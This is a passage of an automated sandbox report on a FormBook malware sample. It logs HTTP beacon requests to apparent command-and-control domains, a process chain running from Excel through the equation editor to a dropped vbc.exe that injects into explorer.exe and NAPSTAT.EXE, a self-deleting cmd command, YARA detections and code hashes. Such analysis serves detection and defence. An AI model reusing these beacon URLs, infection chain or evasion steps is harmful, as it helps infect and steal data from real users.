                                                                                                                                                              May 4, 2021 17:00:15.678167105 CEST716INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              5192.168.2.224917366.235.200.14780C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 17:00:20.875209093 CEST717OUTGET /8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=4vEXK17NAw98WSwuRvIivdS0Cql5iuvV57S3vBg5ItlEon/vTWnd62XFea7/xPqTXNoABg== HTTP/1.1
                                                                                                                                                              Host: www.burundiacademyst.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              May 4, 2021 17:00:21.241594076 CEST718INHTTP/1.1 404 Not Found
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:21 GMT
                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                              Connection: close
                                                                                                                                                              Set-Cookie: __cfduid=d94f65b7ed78b4bb4ec06c920816dea0c1620140420; expires=Thu, 03-Jun-21 15:00:20 GMT; path=/; domain=.www.burundiacademyst.com; HttpOnly; SameSite=Lax
                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                              cf-request-id: 09d97e072e00004e44b212b000000001
                                                                                                                                                              Server: cloudflare
                                                                                                                                                              CF-RAY: 64a2991eb90d4e44-FRA
                                                                                                                                                              Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                              Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                                                                                                                                                              May 4, 2021 17:00:21.241620064 CEST718INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                              Data Ascii: 0


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                              6192.168.2.2249174157.7.107.16580C:\Windows\explorer.exe
                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                              May 4, 2021 17:00:27.158471107 CEST718OUTGET /8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20 HTTP/1.1
                                                                                                                                                              Host: www.pipienta.com
                                                                                                                                                              Connection: close
                                                                                                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                              Data Ascii:
                                                                                                                                                              May 4, 2021 17:00:29.320266962 CEST719INHTTP/1.1 301 Moved Permanently
                                                                                                                                                              Date: Tue, 04 May 2021 15:00:29 GMT
                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                              Content-Length: 0
                                                                                                                                                              Connection: close
                                                                                                                                                              Server: Apache
                                                                                                                                                              X-Powered-By: PHP/7.4.12
                                                                                                                                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                              X-Redirect-By: WordPress
                                                                                                                                                              Location: https://www.pipienta.com/8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20
                                                                                                                                                              X-Cache: MISS


                                                                                                                                                              Code Manipulations

                                                                                                                                                              Statistics

                                                                                                                                                              CPU Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Memory Usage

                                                                                                                                                              Click to jump to process

                                                                                                                                                              High Level Behavior Distribution

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Behavior

                                                                                                                                                              Click to jump to process

                                                                                                                                                              System Behavior

                                                                                                                                                              Analysis Process: EXCEL.EXE PID: 2396 Parent PID: 584

                                                                                                                                                              General

                                                                                                                                                              Start time:16:58:47
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                              Imagebase:0x13fde0000
                                                                                                                                                              File size:27641504 bytes
                                                                                                                                                              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: EQNEDT32.EXE PID: 2584 Parent PID: 584

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:08
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:543304 bytes
                                                                                                                                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: vbc.exe PID: 2872 Parent PID: 2584

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:11
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              • Detection: 13%, ReversingLabs
                                                                                                                                                              Reputation:low

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: vbc.exe PID: 2976 Parent PID: 2872

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:14
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: vbc.exe PID: 2460 Parent PID: 2872

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:15
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:low

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: vbc.exe PID: 2276 Parent PID: 2872

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:16
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Users\Public\vbc.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Users\Public\vbc.exe
                                                                                                                                                              Imagebase:0xa60000
                                                                                                                                                              File size:665600 bytes
                                                                                                                                                              MD5 hash:5551346AA9F251895021B95A2A7CC390
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:low

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: explorer.exe PID: 1388 Parent PID: 2276

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:21
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:
                                                                                                                                                              Imagebase:0xffca0000
                                                                                                                                                              File size:3229696 bytes
                                                                                                                                                              MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: NAPSTAT.EXE PID: 1960 Parent PID: 2276

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:46
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\NAPSTAT.EXE
                                                                                                                                                              Imagebase:0x310000
                                                                                                                                                              File size:279552 bytes
                                                                                                                                                              MD5 hash:4AF92E1821D96E4178732FC04D8FD69C
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                              Reputation:moderate

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Analysis Process: cmd.exe PID: 268 Parent PID: 1960

                                                                                                                                                              General

                                                                                                                                                              Start time:16:59:47
                                                                                                                                                              Start date:04/05/2021
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:/c del 'C:\Users\Public\vbc.exe'
                                                                                                                                                              Imagebase:0x4a6d0000
                                                                                                                                                              File size:302592 bytes
                                                                                                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high

                                                                                                                                                              Chronological Activities

                                                                                                                                                              Disassembly

                                                                                                                                                              Code Analysis

                                                                                                                                                              Reset < >

                                                                                                                                                                Analysis Process: vbc.exe PID: 2872 Parent PID: 2584 vbc.exeCOMMON

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00391170, Relevance: 6.7, Instructions: 6701COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2170926008.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 898ad3a29d8f924cb84c080c80c9c70f1789235500730ef3275f344749f84ad1
                                                                                                                                                                • Instruction ID: 35d92b12174187c0de6e5d580629566eb35d89e3f4a5c4969da097c2e84bfbfd
                                                                                                                                                                • Opcode Fuzzy Hash: 898ad3a29d8f924cb84c080c80c9c70f1789235500730ef3275f344749f84ad1
                                                                                                                                                                • Instruction Fuzzy Hash: A2F3F634A50618CFC764DF64C898E99B7B1FF8A304F1195EAE509AB361DB31AE81CF11
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E64FC, Relevance: 2.8, Strings: 2, Instructions: 310COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: Z~$CU
                                                                                                                                                                • API String ID: 0-4189447603
                                                                                                                                                                • Opcode ID: feb0f6cdbcf31e9950a456bb9c99fd3904fa8a1cfb3b3cd14dd1520de1e79289
                                                                                                                                                                • Instruction ID: 70ac4fc6b915c49727353cacbb1e341e668b9fcde56d848e6e3e1bd973ed9d54
                                                                                                                                                                • Opcode Fuzzy Hash: feb0f6cdbcf31e9950a456bb9c99fd3904fa8a1cfb3b3cd14dd1520de1e79289
                                                                                                                                                                • Instruction Fuzzy Hash: 5BC1B570E06285DFCB15CFAAC5854AEFBB1FF99390B24845AC011EB25AD738D952CF90
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E65E0, Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: CU
                                                                                                                                                                • API String ID: 0-1520199698
                                                                                                                                                                • Opcode ID: 86a919b58a3aa0efae7131c67b7014047a6305efa6b825b7884744f500bd1ea6
                                                                                                                                                                • Instruction ID: 0e56c91d92decf18c5809a116eecd6ffce28c60e26ca3c79a1ab4111eaaaa6ba
                                                                                                                                                                • Opcode Fuzzy Hash: 86a919b58a3aa0efae7131c67b7014047a6305efa6b825b7884744f500bd1ea6
                                                                                                                                                                • Instruction Fuzzy Hash: 22915B70E1624ADFCB04CF96C4854AEFBB6FF99350F60C569D016AB254D738AA42CF90
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E4418, Relevance: 1.5, Strings: 1, Instructions: 207COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: MA
                                                                                                                                                                • API String ID: 0-532321232
                                                                                                                                                                • Opcode ID: d0d377432b19e0bb9031c99de66f93b0c54d1535d1723b1ffd1c01e20caaa32f
                                                                                                                                                                • Instruction ID: 266031134a6b034c5e6c799ffdc75ffdcc15a9056aca95e18b6de0448f14bf8c
                                                                                                                                                                • Opcode Fuzzy Hash: d0d377432b19e0bb9031c99de66f93b0c54d1535d1723b1ffd1c01e20caaa32f
                                                                                                                                                                • Instruction Fuzzy Hash: 9291E575E012498FCB08CFEAC984ADEFBB2BF89310F24942AD419BB254E7349945CF55
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E66F8, Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: CU
                                                                                                                                                                • API String ID: 0-1520199698
                                                                                                                                                                • Opcode ID: f815f41d42cdc82b74ea87f9f6616738ad71ebc2c10cbc8659087832e03907db
                                                                                                                                                                • Instruction ID: 6146d687d7bf0816c1ce6570159239695e426a5a2266e27c4f31881375e3221b
                                                                                                                                                                • Opcode Fuzzy Hash: f815f41d42cdc82b74ea87f9f6616738ad71ebc2c10cbc8659087832e03907db
                                                                                                                                                                • Instruction Fuzzy Hash: 3F816C70E1624ADFCB04CF96C4858AEFBB6FF99340B60C559D016AB255D738EA42CF90
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E6663, Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: CU
                                                                                                                                                                • API String ID: 0-1520199698
                                                                                                                                                                • Opcode ID: d3b71f995b6e77152f4cabaf039f6039dec4041dcd300a341380f659eb3af84e
                                                                                                                                                                • Instruction ID: 511cc5b081065270e04bb4d83892f1efa15aac8e8f94b4ceebc74ae49f897a22
                                                                                                                                                                • Opcode Fuzzy Hash: d3b71f995b6e77152f4cabaf039f6039dec4041dcd300a341380f659eb3af84e
                                                                                                                                                                • Instruction Fuzzy Hash: 3F816F70E1624ADFCB04CF96C4858AEFBB6FF99350B60C559D012AB255D738EA42CF90
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E66C8, Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: CU
                                                                                                                                                                • API String ID: 0-1520199698
                                                                                                                                                                • Opcode ID: fc85cb95108621b96610fb0fdc5fac9d2a090ccb14942f6b2c90b4c113fa75d6
                                                                                                                                                                • Instruction ID: a95716d390f377a7d6f262dff03d446bd2511d697072aae0faef0641fdabf15f
                                                                                                                                                                • Opcode Fuzzy Hash: fc85cb95108621b96610fb0fdc5fac9d2a090ccb14942f6b2c90b4c113fa75d6
                                                                                                                                                                • Instruction Fuzzy Hash: 83816C70D1624ADFCB04CF96C4858AEFBB2FF99350B60C559D012AB259D738EA42CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E6A07, Relevance: 1.4, Strings: 1, Instructions: 178COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: CU
                                                                                                                                                                • API String ID: 0-1520199698
                                                                                                                                                                • Opcode ID: 527b237eb5aeeb60ece4f2d63a091b1bcc2b3d010f425ca489e2bc356480a890
                                                                                                                                                                • Instruction ID: a953328b0843340fb761ca5eeeba15027701c786bda887ecff92b42b1ff50e59
                                                                                                                                                                • Opcode Fuzzy Hash: 527b237eb5aeeb60ece4f2d63a091b1bcc2b3d010f425ca489e2bc356480a890
                                                                                                                                                                • Instruction Fuzzy Hash: CD718E70E1624ADFCB04CF96C4854AEFBB6FF99350B60C559D012AB255D738EA42CF90
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E0448, Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: fCl
                                                                                                                                                                • API String ID: 0-625834680
                                                                                                                                                                • Opcode ID: 3d04d9142030f0c507194be75b81d452d32fdbf9c64ce3e4813b3f7c03500bbf
                                                                                                                                                                • Instruction ID: 1e1b57c59946a13f3c139f9dc7eb1862860a5c8250244555d0cd4cb2b6fa8a37
                                                                                                                                                                • Opcode Fuzzy Hash: 3d04d9142030f0c507194be75b81d452d32fdbf9c64ce3e4813b3f7c03500bbf
                                                                                                                                                                • Instruction Fuzzy Hash: EC611375D006588FDB14CFEAC844ADEFBB6BF89314F10C12AE918AB255DB709985CF90
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 007E0438, Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171266644.00000000007E0000.00000040.00000001.sdmp, Offset: 007E0000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: fCl
                                                                                                                                                                • API String ID: 0-625834680
                                                                                                                                                                • Opcode ID: 775d343d311c2d2513a43d6f6887c90281c6ab3598f7061fb986074c2e54d0ad
                                                                                                                                                                • Instruction ID: 8cb54bff80be56b0aeac0f6dafdd50850ee523e615cce717ea927436d0a2e707
                                                                                                                                                                • Opcode Fuzzy Hash: 775d343d311c2d2513a43d6f6887c90281c6ab3598f7061fb986074c2e54d0ad
                                                                                                                                                                • Instruction Fuzzy Hash: BA611274D012488FDB14CFAAC844ADEFBF2BF89310F20C12AE918AB255DB745985CF91
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00471BF4, Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2171020318.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: &B A
                                                                                                                                                                • API String ID: 0-1130111988
                                                                                                                                                                • Opcode ID: 6ad5ca1703ec8abb204ed600442d5730bf726e06bba0720d85173c2151d840c0
                                                                                                                                                                • Instruction ID: e429661a8a9110473ad25e592975e0920d0dbf4843acbd6bf3f6b43e592b0825
                                                                                                                                                                • Opcode Fuzzy Hash: 6ad5ca1703ec8abb204ed600442d5730bf726e06bba0720d85173c2151d840c0
                                                                                                                                                                • Instruction Fuzzy Hash: EC514771A0066ACFDB24CF65CD40BDDB7B6BB89300F10C6E6D10EA7250E7749A868F14
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 0039AC50, Relevance: 1.3, Instructions: 1294COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000004.00000002.2170926008.0000000000390000.00000040.00000001.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: a7efd2354ef182fef19681c783a71ed4f795cad07a9379dcf8ed8aacdc776e71
                                                                                                                                                                • Instruction ID: 8bdb030b371f9a7e5500e428b6c11ce38d40858e90a5e0421eea6524020195b1
                                                                                                                                                                • Opcode Fuzzy Hash: a7efd2354ef182fef19681c783a71ed4f795cad07a9379dcf8ed8aacdc776e71
                                                                                                                                                                • Instruction Fuzzy Hash: 9BD2D534A41618CFC7A4DF24C898AD9B7B1FF89704F5186E9E509AB361DB31AE81CF41
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

